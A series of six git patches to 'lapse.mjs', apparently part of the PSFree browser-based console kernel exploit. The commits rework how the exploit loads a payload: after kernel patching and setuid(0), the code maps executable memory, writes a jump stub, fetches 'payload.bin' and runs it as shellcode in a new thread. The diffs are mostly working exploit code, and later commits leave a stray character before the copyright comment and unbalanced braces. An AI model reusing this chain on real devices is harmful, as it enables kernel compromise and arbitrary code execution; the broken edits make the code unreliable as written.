From af6ce04ba37314c4d53ef6ec73b10dc96ecd7ca6 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 15:02:47 +0200
Subject: [PATCH 1/6] Update lapse.mjs

---
 lapse.mjs | 80 ++++++++++++++++++++++++++++++++++---------------------
 1 file changed, 49 insertions(+), 31 deletions(-)

diff --git a/lapse.mjs b/lapse.mjs
index 39441a0..b2d98e8 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1625,20 +1625,6 @@ function setup(block_fd) {
     }
     aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
 
-    {
-        const reqs1 = make_reqs1(1);
-        const timo = new Word(1);
-        const id = new Word();
-        aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
-        chain.do_syscall_clear_errno(
-            'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
-        const err = chain.errno;
-        if (err !== 60) { // ETIMEDOUT
-            die(`SceAIO system not blocked. errno: ${err}`);
-        }
-        free_aios(id.addr, 1);
-    }
-
     log('heap grooming');
     // chosen to maximize the number of 0x80 malloc allocs per submission
     const num_reqs = 3;
@@ -1715,7 +1701,7 @@ export async function kexploit() {
     }
 
     // If setuid is successful, we dont need to run the kexploit again
-    try {
+     try {
         if (sysi('setuid', 0) == 0) {
             log("Not running kexploit again.");
             runBinLoader();
@@ -1723,7 +1709,7 @@ export async function kexploit() {
         }
     }
     catch (e) {}
-
+ 
     // fun fact:
     // if the first thing you do since boot is run the web browser, WebKit can
     // use all the cores
@@ -1815,28 +1801,60 @@ function malloc32(sz) {
     ptr.backing = new Uint32Array(backing.buffer);
     return ptr;
 }
-
+function array_from_address(addr, size) {
+var og_array = new Uint32Array(0x1000);
+var og_array_i = mem.addrof(og_array).add(0x10);
+mem.write64(og_array_i, addr);
+mem.write32(og_array_i.add(0x8), size);
+mem.write32(og_array_i.add(0xC), 0x1);
+nogc.push(og_array);
+return og_array;
+}
 
 kexploit().then(() => {
-    
-    window.pld_size = new Int(0x26200000, 0x9);
 
-    var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
-    var payload = window.pld;
-    var bufLen = payload.length * 4
-    var payload_loader = malloc32(bufLen);
-    var loader_writer = payload_loader.backing;
-    for (var i = 0; i < payload.length; i++) {
-        loader_writer[i] = payload[i];
-    }
-    chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
-    var pthread = malloc(0x10);
+ const PROT_READ = 1;
+ const PROT_WRITE = 2;
+ const PROT_EXEC = 4;
 
+var loader_addr = chain.sysp(
+  'mmap',
+  new Int(0, 0),                         
+  0x1000,                               
+  PROT_READ | PROT_WRITE | PROT_EXEC,    
+  0x41000,                              
+  -1,
+  0
+);
+
+ var tmpStubArray = array_from_address(loader_addr, 1);
+ tmpStubArray[0] = 0x00C3E7FF;
+
+ var req = new XMLHttpRequest();
+ req.responseType = "arraybuffer";
+ req.open('GET','payload.bin');
+ req.send();
+ req.onreadystatechange = function () {
+  if (req.readyState == 4) {
+   var PLD = req.response;
+   var payload_buffer = chain.sysp('mmap', 0, 0x300000, 7, 0x41000, -1, 0);
+   var pl = array_from_address(payload_buffer, PLD.byteLength*4);
+   var padding = new Uint8Array(4 - (req.response.byteLength % 4) % 4);
+   var tmp = new Uint8Array(req.response.byteLength + padding.byteLength);
+   tmp.set(new Uint8Array(req.response), 0);
+   tmp.set(padding, req.response.byteLength);
+   var shellcode = new Uint32Array(tmp.buffer);
+   pl.set(shellcode,0);
+   var pthread = malloc(0x10);
+   
     call_nze(
         'pthread_create',
         pthread,
         0,
-        payload_loader,
+        loader_addr,
         payload_buffer,
-    );
+    );	
+   }
+ };
+
 })

From cb7393d3d5da940fe629664f945049251ec57142 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 15:03:46 +0200
Subject: [PATCH 2/6] Delete payload.js

---
 payload.js | 10 ----------
 1 file changed, 10 deletions(-)
 delete mode 100644 payload.js

diff --git a/payload.js b/payload.js
deleted file mode 100644
index f6a82e5..0000000
--- a/payload.js
+++ /dev/null
@@ -1,10 +0,0 @@
-if (sessionStorage.getItem('jbsuccess')) {
-    sessionStorage.setItem('binloader', 1);
-} else {
-    fetch('./payload.bin').then(res => {
-        res.arrayBuffer().then(arr => {
-            window.pld = new Uint32Array(arr);
-            sessionStorage.setItem('jbsuccess', 1);
-        })
-    })
-}

From 9b113eb502855668f418b3742c63806b4e49eee7 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 15:04:20 +0200
Subject: [PATCH 3/6] Update lapse.mjs

---
 lapse.mjs | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lapse.mjs b/lapse.mjs
index b2d98e8..4309b35 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1603,6 +1603,7 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
     kmem.write64(sysent_661.add(8), sy_call);
     // .sy_thrcnt = SY_THR_STATIC
     kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
+    sessionStorage.setItem('jbsuccess', 1);
     alert("kernel exploit succeeded!");
 }
 

From 9f4bbe4370590175f6734d53afd23643edf4d23c Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 15:04:38 +0200
Subject: [PATCH 4/6] Update index.html

---
 index.html | 1 -
 1 file changed, 1 deletion(-)

diff --git a/index.html b/index.html
index 3ca4a11..e392d93 100644
--- a/index.html
+++ b/index.html
@@ -43,6 +43,5 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
         source code and license.<br>
         <pre id='console'></pre>
     </body>
-    <script src="./payload.js"></script>
     <script type='module' src='./alert.mjs'></script>
 </html>

From fdf620ddd8077c4991843eb761dcdf9b086de212 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 20:10:56 +0200
Subject: [PATCH 5/6] Update lapse.mjs

mod Bin loader
---
 lapse.mjs | 37 +++++++++++++++++++------------------
 1 file changed, 19 insertions(+), 18 deletions(-)

diff --git a/lapse.mjs b/lapse.mjs
index 4309b35..7f571eb 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1603,8 +1603,9 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
     kmem.write64(sysent_661.add(8), sy_call);
     // .sy_thrcnt = SY_THR_STATIC
     kmem.write32(sysent_661.add(0x2c), sy_thrcnt);
-    sessionStorage.setItem('jbsuccess', 1);
-    alert("kernel exploit succeeded!");
+    localStorage.ExploitLoaded="yes"
+    sessionStorage.ExploitLoaded="yes";
+   //alert("kernel exploit succeeded!");
 }
 
 
@@ -1696,20 +1697,20 @@ export async function kexploit() {
     await init();
     const _init_t2 = performance.now();
 
-    if(sessionStorage.getItem('binloader')){
-        runBinLoader();
-        return new Promise(() => {});
-    }
+   if (localStorage.ExploitLoaded === "yes" && sessionStorage.ExploitLoaded!="yes") {
+           runBinLoader();
+            return new Promise(() => {});
+      }
+
 
     // If setuid is successful, we dont need to run the kexploit again
      try {
-        if (sysi('setuid', 0) == 0) {
-            log("Not running kexploit again.");
-            runBinLoader();
-            return;
+        chain.sys('setuid', 0);
         }
     }
-    catch (e) {}
+    catch (e) {
+        localStorage.ExploitLoaded = "no";
+    }
  
     // fun fact:
     // if the first thing you do since boot is run the web browser, WebKit can
@@ -1803,13 +1804,13 @@ function malloc32(sz) {
     return ptr;
 }
 function array_from_address(addr, size) {
-var og_array = new Uint32Array(0x1000);
-var og_array_i = mem.addrof(og_array).add(0x10);
-mem.write64(og_array_i, addr);
-mem.write32(og_array_i.add(0x8), size);
-mem.write32(og_array_i.add(0xC), 0x1);
-nogc.push(og_array);
-return og_array;
+   var og_array = new Uint32Array(0x1000);
+    var og_array_i = mem.addrof(og_array).add(0x10);
+    mem.write64(og_array_i, addr);
+    mem.write32(og_array_i.add(0x8), size);
+    mem.write32(og_array_i.add(0xC), 0x1);
+    nogc.push(og_array);
+    return og_array;
 }
 
 kexploit().then(() => {

From a11c98438bba8cf5c9670d822ca83c0b2de6d2d2 Mon Sep 17 00:00:00 2001
From: ps3120 <32280131+ps3120@users.noreply.github.com>
Date: Fri, 30 May 2025 20:15:14 +0200
Subject: [PATCH 6/6] Update lapse.mjs

---
 lapse.mjs | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/lapse.mjs b/lapse.mjs
index 7f571eb..03d4ef3 100644
--- a/lapse.mjs
+++ b/lapse.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2025 anonymous
+F/* Copyright (C) 2025 anonymous
 This file is part of PSFree.
 
 PSFree is free software: you can redistribute it and/or modify
@@ -1702,8 +1702,6 @@ export async function kexploit() {
             return new Promise(() => {});
       }
 
-
-    // If setuid is successful, we dont need to run the kexploit again
      try {
         chain.sys('setuid', 0);
         }